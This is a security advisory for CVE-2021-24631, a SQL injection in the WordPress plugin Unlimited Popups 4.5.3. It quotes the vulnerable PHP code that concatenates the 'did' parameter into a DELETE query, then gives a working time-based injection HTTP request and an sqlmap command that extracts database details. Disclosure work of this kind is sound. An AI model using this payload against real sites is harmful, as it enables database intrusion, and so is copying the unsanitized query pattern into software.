Wp Plugin Unlimited Popups

Plugin Details

Plugin Name: wp-plugin : unlimited-popups
Effected Version : 4.5.3 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Editor
CVE Number : CVE-2021-24631
Identified by : Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The delete popup feature available to Editor and Administrator role, takes in GET parameter did and inserts it into the SQL statement without proper sanitization, validation or escaping therefore leading to SQL Injection.

Vulnerable Code: popuplist.php#L16

15:    $delid = $_GET["did"];
16:    $wpdb->query("delete from " . $table_name . " where id=" . $delid);

PoC Screenshot

unlimited-popups-poc

Exploit

GET /wp-admin/admin.php?page=popup&info=del&did=1 AND (SELECT 4420 FROM (SELECT(SLEEP(5)))yVXX) HTTP/1.1
Host: 172.28.128.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.50/wp-admin/admin.php?page=popup
Connection: close
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7Cd369b0fc734febbd56e02a2729ea1e89ed8bdef88858aa2bf66244e80af40313; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7C52b09dc0a0cd88faff03e9a9bce98b1cace6dcf841b17fe668c52d49083ff760; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623063303
Upgrade-Insecure-Requests: 1

SQLMap Command

sqlmap -r popup.req --dbms mysql --current-user --current-db -b -p did --batch --flush-session